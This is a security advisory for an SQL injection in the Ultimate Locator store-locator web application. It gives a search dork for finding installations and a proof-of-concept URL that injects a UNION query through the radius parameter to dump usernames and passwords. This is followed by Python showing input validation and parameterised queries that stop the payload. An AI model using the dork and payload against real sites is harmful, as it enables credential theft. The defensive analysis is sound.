Ultimate Locator suffers from a remote SQL injection vulnerability.
429137160b75a3f7b44e26a49eca96e4b881cd161ab809fadbc9afb392402d56
# Exploit Title: Ultimate Locator SQL Injection Vulnerability
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Software Link: http://www.ultimatelocator.com/
# Dork: "Powered by Ultimate Locator"
# Tested on: [Linux/Windows 7]
# Vulnerable File: results_list.php
# Vulnerable parameter: radius=
##############################################################
PoC:
http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login--
##############################################################
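As an added defender-side illustration (not part of this advisory and not Ultimate Locator's own code), the following Python shows how a store-locator endpoint should handle the radius parameter so that the injected value in the PoC above never reaches the SQL engine: the value is validated as a bounded positive integer and then bound as a query parameter rather than spliced into the query string. The function names, the `locations` and `login` tables, and the sample rows are constructed assumptions for this example.

```python
import re
import sqlite3

# Hypothetical hardening for an endpoint like results_list.php: the radius
# value is accepted only as a bounded positive integer and the SQL uses a
# bound parameter, so user input is never part of the query text. Names and
# tables here are assumptions for the example, not the product's code.

RADIUS_RE = re.compile(r"^[0-9]{1,4}$")
MAX_RADIUS_MILES = 500


def parse_radius(raw):
    """Return the radius as an int, or raise ValueError for anything that is
    not a plain positive integer within the allowed range."""
    if raw is None or not RADIUS_RE.match(raw.strip()):
        raise ValueError("radius must be a positive integer")
    radius = int(raw.strip())
    if radius == 0 or radius > MAX_RADIUS_MILES:
        raise ValueError("radius out of range")
    return radius


def build_demo_db():
    """Constructed sample data: a few store locations with a precomputed
    distance (miles) from the searched ZIP code."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE locations (id INTEGER, name TEXT, zip TEXT, distance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO locations VALUES (?, ?, ?, ?)",
        [
            (1, "Downtown", "94102", 0),
            (2, "Mission", "94110", 3),
            (3, "Oakland", "94612", 12),
            (4, "San Jose", "95113", 48),
        ],
    )
    # Stand-in for the 'login' table the PoC targets; the locator query
    # must never be able to read it.
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'hash-placeholder')")
    return conn


def find_locations(conn, raw_radius):
    """Look up stores within the validated radius using a bound parameter."""
    radius = parse_radius(raw_radius)
    rows = conn.execute(
        "SELECT id, name FROM locations WHERE distance <= ? ORDER BY distance",
        (radius,),
    ).fetchall()
    return [name for _, name in rows]


def safe_lookup(conn, raw_radius):
    """Request-handler style wrapper: report a rejected value instead of raising."""
    try:
        return {"ok": True, "results": find_locations(conn, raw_radius)}
    except ValueError as exc:
        return {"ok": False, "error": str(exc)}


if __name__ == "__main__":
    db = build_demo_db()
    print(safe_lookup(db, "10"))
    # The PoC-style value fails validation before any SQL is executed.
    print(safe_lookup(db, "-50 UNION ALL SELECT 1,2 FROM login--"))
```

The two controls are independent: the whitelist regex rejects the payload outright, and even if validation were loosened, the bound parameter means the value is sent to the database as data, not as SQL text.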
www.areyousecure.net
www.websiteauditing.org
# Shouts to the Belegit crew